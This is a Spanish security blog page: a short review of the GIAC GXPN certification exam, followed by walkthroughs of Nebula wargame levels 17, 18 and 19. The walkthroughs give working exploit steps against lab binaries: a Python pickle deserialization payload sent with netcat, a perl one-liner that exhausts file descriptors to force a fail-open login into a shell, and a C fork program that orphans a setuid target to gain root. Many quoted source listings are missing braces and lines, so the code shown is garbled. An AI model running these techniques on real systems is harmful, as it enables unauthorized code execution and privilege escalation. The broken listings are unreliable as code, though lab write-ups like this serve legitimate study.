El viernes pasado me acerqué a Dublín para realizar el examen de la certificación GIAC GXPN: Exploit Researcher and Advanced Penetration Tester. El examen fue más que bien (90,67%), así que estoy muy contento. A diferencia del centro anterior, ésta vez el local estaba mucho mejor. También es cierto que ésta es la primera certificación de SANS que obtengo desde que cambiaron a los centros VUPEN. Hay que decir, no obstante, que pese a que he leído quejas de algunos compañeros con respecto a éstos centros -verdaderas historias de terror en algunos casos- yo no tuve ningún problema, ni con los libros (el examen es open book) ni con mis notas, ni nada. Bueno, durante el examen saltó una alarma, pero el responsable entró a la sala a avisarnos de que era una falsa alarma y de que podíamos continuar.

El contenido del curso, que ésta vez realicé en On Demand, es adecuado, aunque creo que no debieron remozar el SEC709 en el SEC660 y el SEC710. Supongo que lo hicieron porque un curso únicamente sobre exploits no atraería a tanta gente (a mí sí), pero al separarlo en dos e incluir en éste primer curso más contenido de pentesting, la combinación queda un poco rara. El apartado de Python está bien, sobretodo si no tienes idea de Python. Para aquellos con un poco de experiencia con el lenguaje, es una sección superflua. La sección de criptografía para pentesters sí me gustó bastante, creo que es útil y que afronta temas que muchas veces quedan sin revisar durante los tests de intrusión. La parte de pentesting de red queda un poco coja desde mi punto de vista, y la parte de exploits no se mete en profundidad con la mayoría de los temas; imagino que es lo que se llevaron al SEC710. Sin embargo, he aprendido muchas cosas realizando el curso, lo he pasado bien y he mejorado en muchos aspectos, y eso es lo importante.

El examen es ligeramente más corto que el GPEN (3 horas en vez de 4), y contiene la mitad de preguntas (75). A pesar de que creo que el contenido del SEC660 es más complejo, me pareció que el examen era más sencillo (si bien saqué peor nota que en el GPEN). Al igual que con el GPEN, normalmente sobra tiempo (hora y media en este caso), ya que si hay algo que no sabes, es raro que vayas a poder encontrarlo buscando en los libros, ya que la mayor parte de las preguntas no son de ese estilo.

En conclusión, una experiencia siempre positiva con SANS.

Tagged with: , , ,
Publicado en General, seguridad

Solución Nebula Nivel 18

Como nos indican en las instrucciones de este nivel, existen tres formas de solucionarlo: fácil, media y difícil. Voy a contar cuales son y cómo resolverlo a través de una de ellas.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <getopt.h>

struct {
FILE *debugfile;
int verbose;
int loggedin;
} globals;

#define dprintf(...) if(globals.debugfile) fprintf(globals.debugfile, __VA_ARGS__)
#define dvprintf(num, ...) if(globals.debugfile && globals.verbose >= num) fprintf(globals.debugfile, __VA_ARGS__)

#define PWFILE "/home/flag18/password"

void login(char *pw)
FILE *fp;

fp = fopen(PWFILE, "r");
if(fp) {
char file[64];

if(fgets(file, sizeof(file) - 1, fp) == NULL) {
dprintf("Unable to read password file %s\n", PWFILE);

if(strcmp(pw, file) != 0) return;
dprintf("logged in successfully (with%s password file)\n", fp == NULL ? "out" : "");

globals.loggedin = 1;


void notsupported(char *what)
char *buffer = NULL;
asprintf(&buffer, "--> [%s] is unsupported at this current time.\n", what);

void setuser(char *user)
char msg[128];

sprintf(msg, "unable to set user to '%s' -- not supported.\n", user);
printf("%s\n", msg);


int main(int argc, char **argv, char **envp)
char c;

while((c = getopt(argc, argv, "d:v")) != -1) {
switch(c) {
case 'd':
globals.debugfile = fopen(optarg, "w+");
if(globals.debugfile == NULL) err(1, "Unable to open %s", optarg);
setvbuf(globals.debugfile, NULL, _IONBF, 0);
case 'v':

dprintf("Starting up. Verbose level = %d\n", globals.verbose);

setresgid(getegid(), getegid(), getegid());
setresuid(geteuid(), geteuid(), geteuid());

while(1) {
char line[256];
char *p, *q;

q = fgets(line, sizeof(line)-1, stdin);
if(q == NULL) break;
p = strchr(line, '\n'); if(p) *p = 0;
p = strchr(line, '\r'); if(p) *p = 0;

dvprintf(2, "got [%s] as input\n", line);

if(strncmp(line, "login", 5) == 0) {
dvprintf(3, "attempting to login\n");
login(line + 6);
} else if(strncmp(line, "logout", 6) == 0) {
globals.loggedin = 0;
} else if(strncmp(line, "shell", 5) == 0) {
dvprintf(3, "attempting to start shell\n");
if(globals.loggedin) {
execve("/bin/sh", argv, envp);
err(1, "unable to execve");
dprintf("Permission denied\n");
} else if(strncmp(line, "logout", 4) == 0) {
globals.loggedin = 0;
} else if(strncmp(line, "closelog", 8) == 0) {
if(globals.debugfile) fclose(globals.debugfile);
globals.debugfile = NULL;
} else if(strncmp(line, "site exec", 9) == 0) {
notsupported(line + 10);
} else if(strncmp(line, "setuser", 7) == 0) {
setuser(line + 8);

return 0;


Si os fijáis con detenimiento, veréis que existe un buffer overflow en la función setuser(), en el parámetro msg. Sería posible solucionar el reto a través de ésta vulnerabilidad, aunque yo personalmente lo descarté. La complicación reside en que el sistema tiene ASLR activado, y el binario ha sido compilado con SSP y NX. Saltarse las protecciones y desarrollar un exploit funcional, aunque posible, está un poco fuera de lugar habiendo otras dos maneras sencillas de hacerlo.

SSP Detecta el BoF


Existe una vulnerabilidad de tipo «format string» en la función notsupported(). La solución más evidente desde aquí sería tratar de sobreescribir la variable globals.loggedin, de tal forma que se pueda invocar la shell sin problemas. Sin embargo, el programa ha sido compilado con FORTIFY_SOURCE, y aunque podemos leer posiciones de memoria con esta vulnerabilidad, cuando tratamos de sobreescribir la memoria, la ejecución es abortada.

Fortify Source evita el format-strings

La dirección utilizada pertenece al .bss y se ha calculado con anterioridad para que apunte a globals.loggedin. Tratar de sobreescribir el .dtors produce el mismo efecto. En realidad, cualquier sobreescritura producirá una violación de segmento o el mensaje que se ve en la captura. Otra posibilidad sería leer de memoria el password, ya que estará en la pila durante el transcurso de la función login(). Sin embargo, no creo que el password sea accesible desde la función notsupported() tras la ejecución de login(). Cualquier otra idea, será interesante leerla en los comentarios.


La forma sencilla de explotar la vulnerabilidad radica otra vez en conocer un poco acerca del funcionamiento de linux, en éste caso, conocer los límites de los procesos. Fijaos bien en la función login(), en el flujo lógico:

FILE *fp;
fp = fopen(PWFILE, "r");
if(fp) {
globals.loggedin = 1;

Abre el fichero PWFILE, si lo abre satisfactoriamente, hace cosas con él. Si no, se acaba el «if» y te da acceso a la aplicación. Es un claro ejemplo de «fail open». La pregunta evidente es: ¿cómo hacemos que falle la apertura del fichero? Al fichero en sí no tenemos acceso, así que no podemos cambiarle los permisos ni eliminarlo para que el programa falle. Sin embargo, seguro que habéis notado algo más, algo que falta. La función login() abre el fichero, pero no lo cierra. Esto es relevante cuando se añade el hecho de que un proceso tiene un máximo número de descriptores de fichero asignados. Cuando los agote todos, fopen() fallará.

1024 descriptores disponibles

Así que el truco va a consistir en invocar la función login() 1024 veces, y entonces el login fallará. Una vez que falle, fijará globals.loggedin a 1, y podremos invocar la shell. Veamos qué pasa.

Login+shell no funciona

Algo ha salido mal. Para ser más exactos, nuestra idea tiene un problema: cuando se va a ejecutar la shell, no quedan descriptores libres para ser utilizados por execve() durante la creación del proceso. Por suerte para nosotros, tenemos a nuestra disposición la llamada closelog, que cómo podéis ver, cierra el log, liberando un descriptor de fichero que nos viene muy bien.

} else if(strncmp(line, "closelog", 8) == 0) {
if(globals.debugfile) fclose(globals.debugfile);
globals.debugfile = NULL;

Así que a continuación vamos a llamar 1021 veces a login(), luego una vez a closelog(), y posteriormente a shell().

Algo no termina de funcionar aquí, pero hemos invocado la shell

El problema es que la shell se invoca con los parámeros que recibe el programa flag18, y no sabe interpretar el flag «-d». Hay una funcionalidad de bash que podemos utilizar para sobrepasar este escollo, el flag «–init-file». Éste flag hará que bash ejecute el contenido del fichero especificado. Aunque he intentado hacerlo de varias maneras, parece que lo único que consigo es que se ejecute el propio log del programa. Como el log del programa no contiene comandos reconocidos, la salida son un montón de líneas indicando que no encuentra el comando tal o cual.

level18@nebula:~$ perl -e 'print "login\n"x1021 . "closelog\n" . "shell\n"' | /home/flag18/flag18 --init-file /tmp/file -d /tmp/debug2.txt -vvv
/home/flag18/flag18: invalid option -- '-'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 'n'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 't'
/home/flag18/flag18: invalid option -- '-'
/home/flag18/flag18: invalid option -- 'f'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 'l'
/home/flag18/flag18: invalid option -- 'e'
/tmp/debug2.txt: line 1: Starting: command not found
/tmp/debug2.txt: line 2: got: command not found
/tmp/debug2.txt: line 3: attempting: command not found
/tmp/debug2.txt: line 4: got: command not found
/tmp/debug2.txt: line 5: attempting: command not found
/tmp/debug2.txt: line 6: got: command not found
/tmp/debug2.txt: line 7: attempting: command not found
/tmp/debug2.txt: line 8: got: command not found

La solución final, es crear un comando que se llame «Starting» o «got», para que lo encuentre la shell, y que dicho comando ejecute nuestras instrucciones. Para ello, vamos a crear un script de bash llamado «Starting», lo vamos a colocar en nuestro directorio actual, y vamos a añadir nuestro directorio actual al PATH, de tal forma que bash lo encuentre.

Creamos «Starting» en el directorio local

Y efectivamente en el fichero /tmp/flag18, tenemos el flag de éste nivel.

level18@nebula:~$ cat /tmp/flag18
You have successfully executed getflag on a target account

Con esto hemos cubierto todos los niveles de Nebula. Cualquier pregunta, en los comentarios.


Tagged with: , , , ,
Publicado en exploiting, hacking

Soluciones Nebula Niveles 17,19

Nivel 17:

Tenemos un pequeño programa en python que acepta una entrada y la procesa.


import os
import pickle
import time
import socket
import signal

signal.signal(signal.SIGCHLD, signal.SIG_IGN)

def server(skt):
line = skt.recv(1024)

obj = pickle.loads(line)

for i in obj:
clnt.send("why did you send me " + i + "?\n")

skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.bind(('', 10007))

while True:
clnt, addr = skt.accept()

if(os.fork() == 0):
clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))

He de admitir que a priori no tenía ni idea de por dónde coger este programa, así que me fui a mirar la documentación de algunas funciones de python que utiliza éste programa. Al final, resultó que la función pickle() no es segura, y que durante el proceso de «unpickling» se puede producir la ejecución arbitraria de código.

Me hice un pequeño script en python que me permitía ver qué salida se generaba cuando se usaba pickle sobre determinados objetos (cadenas, funciones, funciones anidadas…) para poder construir una llamada que desencadenara el problema de seguridad antes mencionado:

import time
import os
import pickle

f = open("/dev/stdout","w")

Con esto, y un poco más de investigación sobre la función REDUCE de pickle, pude llegar a lo siguiente:

level17@nebula:~$ cat /tmp/send
(S'getflag > /tmp/flag17'

Ahora, sólo queda enviarlo al servicio que escucha en el puerto 10007, con netcat por ejemplo, ya que está instalado en la VM.

Enviar y triunfar

Nivel 19:

El siguiente programa ejecuta una shell si «root lo ha ejecutado»:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>

int main(int argc, char **argv, char **envp)
pid_t pid;
char buf[256];
struct stat statbuf;

/* Get the parent's /proc entry, so we can verify its user id */

snprintf(buf, sizeof(buf)-1, "/proc/%d", getppid());

/* stat() it */

if(stat(buf, &statbuf) == -1) {
printf("Unable to check parent process\n");

/* check the owner id */

if(statbuf.st_uid == 0) {
/* If root started us, it is ok to start the shell */

execve("/bin/sh", argv, envp);
err(1, "Unable to execve");

printf("You are unauthorized to run this program\n");

El problema es que esa comprobación de «si root nos ha ejecutado» está un tanto mal hecha, ya que lo que realmente está comprobando es si su proceso padre se está ejecutando como el usuario root. En esencia, esto quiere decir que si conseguimos que el padre de este programa sea cualquier proceso que ejecute como root, obtendremos la shell de root. Cosa que no es demasiado difícil de conseguir si conocemos cómo funionan los procesos en Linux.

Si un proceso que tiene hijos, muere antes de la finalización de éstos, deja a los procesos hijos «huérfanos», lo cual supone un problema, ya que no tienen a quien comunicar su estado de finalización, ni las señales que no capturan, entre otras cosas. Para ésto, existe en Linux el proceso init. Init siempre se ejecuta al iniciar el sistema, como primer proceso del mismo, con el número de proceso 1. Además, se encargará de «acoger», y convertirse por tanto en el padre, de todos aquellos procesos huérfanos del sistema. Ah, e init se ejecuta como root 😉

Por tanto, si ejecutamos el programa víctima, y después morimos, el programa será heredado por init y podremos obtener la shell. Bueno, podremos ejecutar comandos en esa shell de root, ya que obtenerla será difícil puesto que habremos perdido el control del hijo al morirnos. El siguiente programa en C hace esto mismo:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>

int main(void){
pid_t pid;
char* args[]= {"/bin/sh", "-c", "getflag > /tmp/flag19", NULL};
pid = fork();
if (pid==0){
//hijo, a ejecutar el programa objetivo
execve("/home/flag19/flag19",args, NULL);
}else if (pid <0){
//padre, debe morir
return 0;

Cómo veis, se ejecuta flag19 pasándole los argumentos que luego él transmitirá a la shell mediante la llamada execve.

Explotando los problemas padre-hijo

Ya sólo nos queda el nivel 18, al que he decidido dedicarle una entrada a parte para no alargar ésta más de la cuenta.


Tagged with: , , , ,
Publicado en exploiting, hacking